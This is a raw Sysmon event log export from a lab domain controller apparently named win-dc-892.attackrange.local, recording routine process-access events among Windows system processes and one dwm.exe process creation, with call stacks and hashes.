12:00:44.690{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0E00-00000000AE01}10801348C:\Windows\system32\LogonUI.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.690{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.690{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.690{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0800-00000000AE01}704720C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0900-00000000AE01}7881068C:\Windows\system32\winlogon.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.680{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\System32\dwm.exe10.0.14393.0 
(rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{266CAFBE-646C-6064-8AC4-000000000000}0xc48a1SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 